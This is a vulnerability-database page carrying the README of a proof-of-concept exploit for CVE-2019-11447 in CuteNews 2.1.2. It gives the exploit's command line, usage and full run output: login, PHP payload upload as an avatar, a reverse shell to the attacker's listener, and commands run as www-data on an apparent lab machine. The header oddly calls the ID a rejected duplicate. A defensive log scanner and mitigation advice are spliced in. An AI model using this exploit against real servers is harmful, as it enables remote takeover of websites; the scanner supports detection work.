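Related vulnerability
Title:
Duplicate ID
(CVE-2019-11447)
Description: CutePHP CuteNews is a news management system. It provides search, file upload management, access control, backup and restore functions. "Rejected": do not use this ID. Reason: this ID is a duplicate of CNNVD-201110-126; all users of CNNVD IDs should refer to CNNVD-201110-126. To prevent accidental use, all information under this ID has been removed.
Description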
CutePHP Cute News 2.1.2 RCE PoC
Introduction
# CVE-2019-11447
## CutePHP Cute News 2.1.2 RCE PoC
**Target :** 2.1.2
This PoC script is based on a simple implementation of the original exploit by **BobbySox**. The original exploit is an MSF module by **Akkus**.
The script takes the target IP address or domain along with credentials; it then automatically logs in, uploads the payload, triggers it and catches the reverse shell.
```
python cve-2019-11447.py -t 10.10.10.206 -u twh -p p4ssw0rd -lh 10.10.16.2 -lp 4444 -f shell
--------------------------------------
--- CVE-2019-11447 -------------------
--- CuteNews Arbitrary File Upload ---
--- CutePHP CuteNews 2.1.2 -----------
--------------------------------------
[>] Found By : Akkus [ https://twitter.com/ehakkus ]
[>] PoC By : thewhiteh4t [ https://twitter.com/thewhiteh4t ]
[>] Target : http://10.10.10.206/CuteNews/index.php
[>] Username : twh
[>] Password : p4ssw0rd
[!] Logging in...
[+] Logged In!
[+] Loading Profile...
[+] Searching Signatures...
[!] Uploading Payload...
[+] Loading Profile...
[+] Searching Avatar URL...
[*] URL : http://passage.htb/CuteNews/uploads/avatar_twh_shell.php
[!] Payload will trigger in 5 seconds...
[!] Starting Listner...
[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.10.10.206 on port 35196
[*] Switching to interactive mode
bash: cannot set terminal process group (1656): Inappropriate ioctl for device
bash: no job control in this shell
www-data@passage:/var/www/html/CuteNews/uploads$ $ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@passage:/var/www/html/CuteNews/uploads$ $
```
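For detection, the run above leaves one clear trace: a request for a script-typed file under the avatar upload path. The following is an added example, not part of the original PoC or of CuteNews; it assumes combined-format access logs, an assumed list of PHP-handled extensions, and constructed sample log lines.

```python
import re
from urllib.parse import unquote

# Extensions a PHP handler may execute (assumption: match this to your server config).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

# Combined log format: ip ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3})')

# Avatar naming seen in the run output above: /uploads/avatar_<user>_<file>.<ext>
AVATAR_RE = re.compile(r"/uploads/(avatar_[^/?#]+)", re.IGNORECASE)


def script_ext(filename):
    """Return the first script extension in any dot-separated segment, else None.

    All segments are checked because multi-extension names (pic.php.jpg) can
    still reach the PHP handler under some Apache AddHandler setups.
    """
    segments = filename.lower().split(".")[1:]
    return next((s for s in segments if s in SCRIPT_EXTS), None)


def find_script_avatars(lines):
    """Return (client_ip, decoded_path, status, ext) for script-typed avatar requests."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, raw_path, status = m.groups()
        path = unquote(raw_path)  # catch percent-encoded names such as %2Ephp
        a = AVATAR_RE.search(path)
        ext = script_ext(a.group(1)) if a else None
        if ext:
            hits.append((ip, path, int(status), ext))
    return hits


# Constructed sample lines (documentation-range addresses), not from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2021:10:00:01 +0000] "POST /CuteNews/index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2021:10:00:06 +0000] "GET /CuteNews/uploads/avatar_twh_shell.php HTTP/1.1" 200 0',
    '198.51.100.4 - - [01/Jan/2021:10:02:00 +0000] "GET /CuteNews/uploads/avatar_bob_me.png HTTP/1.1" 200 2048',
    '198.51.100.9 - - [01/Jan/2021:10:03:00 +0000] "GET /CuteNews/uploads/avatar_eve_pic.PHP.jpg HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for hit in find_script_avatars(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 means the file exists and was served; the durable mitigation is to stop the web server from executing anything in the uploads directory and to validate avatar content server-side.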
## Dependencies
```
pip3 install requests bs4 pwntools
```
## Usage
```
python cve-2019-11447.py -h
usage: cve-2019-11447.py [-h] [-t TARGET] [-u UNAME] [-p PASSW] [-lh LHOST] [-lp LPORT] [-f FILE]
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET Target IP address or domain
-u UNAME, --uname UNAME Username
-p PASSW, --passw PASSW Password
-lh LHOST, --lhost LHOST Listener IP address
-lp LPORT, --lport LPORT Listener Port
-f FILE, --file FILE Filename for payload WITHOUT extension
```
## Credits
* Thank you **Akkus** for discovering this vulnerability
  * https://www.exploit-db.com/exploits/46698/
* Thank you **BobbySox** for implementing it in a simple way
  * https://github.com/kyle41111/CuteScript
File snapshot
[4.0K] /data/pocs/a5d6ec99007abc086abcbeac33eb4c39c3cfb94f
├── [4.9K] cve-2019-11447.py
└── [2.4K] README.md
0 directories, 2 files